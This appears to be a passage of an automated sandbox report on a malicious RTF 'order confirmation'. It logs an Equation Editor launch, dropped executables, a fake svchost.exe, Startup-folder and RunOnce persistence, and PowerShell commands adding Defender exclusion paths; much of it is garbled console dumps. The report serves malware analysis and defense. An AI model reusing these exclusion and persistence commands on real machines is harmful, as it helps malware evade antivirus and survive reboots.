                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............(.......0.......r.......................0.......G.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............(.......0...............................0.......S.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............(.......\...............................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......-.F.o.r.c.e.............(.......\...............................0......._.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............(...............'.......................0......._.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............(...............R.......................0.......k.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............(...............m.......................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............(.......0...............................0.......w.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......................................0.......................l.......H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......................................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............(.......0.......H.......................0...............................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............(.......0.......f.......................0...............................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....D...............H...............................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....D.......................*.......................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....D...............H.......j.......................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....D...............................................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....D...............................................0.......;...............|.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....D...............................................0.......;.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7......./.......................0.......G...............".......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.....D......................._.......................0.......G.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....D...............................................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....D...............................................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......6.9.8.9.\.s.v.c.h.o.s.t...e.x.e. .-.F.o.r.c.e...................0......._.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....D...............\...............................0......._.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....D...............\.......C.......................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.....D.......................j.......................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....D...............0...............................0.......w.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D...............0...............................0.......................l.......................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D...............0.......N.......................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.....D...............0...............................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....D...............................................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............L...............+.......................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............L...............J.......................0.......#.......X...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............L.......$.......v.......................0......./.......................8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............L.......$...............................0......./.......X...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............L.......................................0.......;...............|.......8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............L.......................................0.......;.......X...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......#.......................0.......G.......X.......".......8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............L...............C.......................0.......G.......X...............8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............L...............q.......................0.......S.......................8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............L.......................................0.......S.......X...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............L.......................................0......._.......................8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............L.......................................0......._.......X...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k.......d...e.x.e. .-.F.o.r.c.e.L.......................................0.......k.......X...............8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............L...............$.......................0.......k.......X...............8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............L...............b.......................0.......w.......................8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............L.......................................0.......w.......X...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0...............X.......2.......8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............L.......................................0...............X...............8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............L.......................................0.......................l.......8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............L...............B.......................0...............X...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............L...............p.......................0...............X...............8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............L.......................................0...............X...............8...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.....................................................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............................h.......................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................................................0......./.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.....................................................0......./.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................................................0.......;...............|.......H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.....................................................0.......;.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......0.......................0.......G...............".......H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............................L.......................0.......G.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............................z.......................0.......S.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.....................................................0.......S.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_.......6.9.8.9.\.s.v.c.h.o.s.t...e.x.e. .-.F.o.r.c.e...................0......._.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.....................................................0......._.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................!.......................0.......k.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............................A.......................0.......k.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w....... . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0.......w...............2.......H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.....................X...............................0.......w.......................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0.......................l.......H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.....................................................0...............................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............................%.......................0...............................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................B.......................0...............................H...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............H.......................................0.......#.......................................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................#...............(.P.............H.............../.......................0.......#.......H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............H...............Y.......................0......./.......................h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ......................../...............(.P.............H...............w.......................0......./.......H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............H.......................................0.......;...............|.......h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................;...............(.P.............H...............&.......................0.......;.......H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G.......A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.7.......p.......................0.......G.......H.......".......h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................G...............(.P.............H.......................................0.......G.......H...............h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............H.......................................0.......S.......................h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................S...............(.P.............H.......................................0.......S.......H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............H.......................................0......._.......................h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................_...............(.P.............H.......................................0......._.......H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k.......d...e.x.e. .-.F.o.r.c.e.H.......................................0.......k.......H...............h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................k...............(.P.............H...............U.......................0.......k.......H...............h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............H.......................................0.......w.......................h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................w...............(.P.............H.......................................0.......w.......H...............................
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n...............0...............H.......2.......h...............
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............H...............L.......................0...............H...............h...............
                      Source: C:\Users\user\AppData\Roaming\srt.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
                      Source: order-confirmation.doc__.rtf ReversingLabs: Detection: 40%
                      Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                      Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\srt.exe C:\Users\user\AppData\Roaming\srt.exe
                      Source: C:\Users\user\AppData\Roaming\srt.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\srt.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\srt.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe'
                      Source: C:\Users\user\AppData\Roaming\srt.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: unknown Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe'
                      Source: C:\Users\user\AppData\Roaming\srt.exe Process created: C:\Users\user\AppData\Roaming\srt.exe C:\Users\user\AppData\Roaming\srt.exe
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe' -Force
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe' -Force
                      Source: unknown Process created: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe 'C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe'
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                      Source: C:\Users\user\AppData\Roaming\srt.exe Process created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Process created: unknown unknown
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe Process created: unknown unknown
                      Source: C:\Users\user\AppData\Roaming\srt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2101979612.0000000002776000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2104726007.00000000027F6000.00000004.00000040.sdmp, powershell.exe, 00000017.00000002.2164613076.0000000002866000.00000004.00000040.sdmp
                      Source: Binary string: ??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.3028.5597425ion.pdby.resources.exes.exeI.ni.dll source: powershell.exe, 00000006.00000002.2100253520.00000000002C5000.00000004.00000020.sdmp
                      Source: Binary string: C:\Windows\System.Management.Automation.pdbV source: powershell.exe, 00000004.00000002.2101979612.0000000002776000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2104726007.00000000027F6000.00000004.00000040.sdmp, powershell.exe, 00000017.00000002.2164613076.0000000002866000.00000004.00000040.sdmp
                      Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdbB source: powershell.exe, 00000004.00000002.2101979612.0000000002776000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2104726007.00000000027F6000.00000004.00000040.sdmp, powershell.exe, 00000017.00000002.2164613076.0000000002866000.00000004.00000040.sdmp
                      Source: Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2101979612.0000000002776000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2104726007.00000000027F6000.00000004.00000040.sdmp, powershell.exe, 00000017.00000002.2164613076.0000000002866000.00000004.00000040.sdmp
                      Source: Binary string: ??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.2328.5596582ion.pdby.resources.exes.exeI.ni.dll source: powershell.exe, 00000004.00000002.2098522265.00000000006BB000.00000004.00000020.sdmp
                      Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2101979612.0000000002776000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2104726007.00000000027F6000.00000004.00000040.sdmp, powershell.exe, 00000017.00000002.2164613076.0000000002866000.00000004.00000040.sdmp
                      Source: Binary string: mscorrc.pdb source: powershell.exe, 00000004.00000002.2102530848.0000000002A80000.00000002.00000001.sdmp
                      Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.2101979612.0000000002776000.00000004.00000040.sdmp, powershell.exe, 00000006.00000002.2104726007.00000000027F6000.00000004.00000040.sdmp, powershell.exe, 00000017.00000002.2164613076.0000000002866000.00000004.00000040.sdmp
                      Source: srt.exe.2.dr Static PE information: 0x8CF7700A [Sat Dec 10 23:45:14 2044 UTC]
                      Source: C:\Users\user\AppData\Roaming\srt.exe Code function: 3_2_003C26D5 push ss; retn 0006h 3_2_003C26F0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_02B209AC push 04418B05h; ret 4_2_02B209C3
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_02B20B30 push 08418B05h; ret 4_2_02B20B53
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_02B20950 push 04418B05h; ret 4_2_02B209C3
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_028211A3 push 9BC2BDD8h; retn 569Bh 6_2_02821202
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_01EDA1A8 push 9B09C380h; ret 10_2_01EDA219
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Code function: 12_2_013726D5 push ss; retn 0006h 12_2_013726F0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_0289117C push 93CF84E6h; iretd 15_2_02891202
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_057109F1 push eax; retn 002Eh 16_2_05710A09
                      Source: C:\Users\user\AppData\Roaming\srt.exe Code function: 20_2_003C26D5 push ss; retn 0006h 20_2_003C26F0
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_057109F1 push eax; retn 004Ch 23_2_05710A09
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_057109A1 push eax; retn 004Ch 23_2_05710A09
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_058100DA push eax; retf 005Ah 32_2_058100F1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 32_2_058100F4 push eax; retf 005Ah 32_2_058100F1
                      Source: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe Code function: 38_2_000726D5 push ss; retn 0006h 38_2_000726F0
                      Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe Code function: 39_2_013726D5 push ss; retn 0006h 39_2_013726F0

                      Persistence and Installation Behavior:

                      Drops PE files with benign system names
                      Source: C:\Users\user\AppData\Roaming\srt.exe File created: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe
                      Drops executables to the windows directory (C:\Windows) and starts them
                      Source: unknown Executable created and started: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe
                      Source: C:\Users\user\AppData\Roaming\srt.exe File created: C:\Windows\Resources\Themes\d01f0bR8dD56989\svchost.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\srt.exe
                      Source: C:\Users\user\AppData\Roaming\srt.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe

                      Boot Survival:

                      Creates an autostart registry key pointing to binary in C:\Windows
                      Source: C:\Users\user\AppData\Roaming\srt.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce 69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d
                      Drops PE files to the startup folder
                      Source: C:\Users\user\AppData\Roaming\srt.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\69vdz0d62eh81022f8deT58t2dmA2mdw7IdFa8a78d.exe
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\srt.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
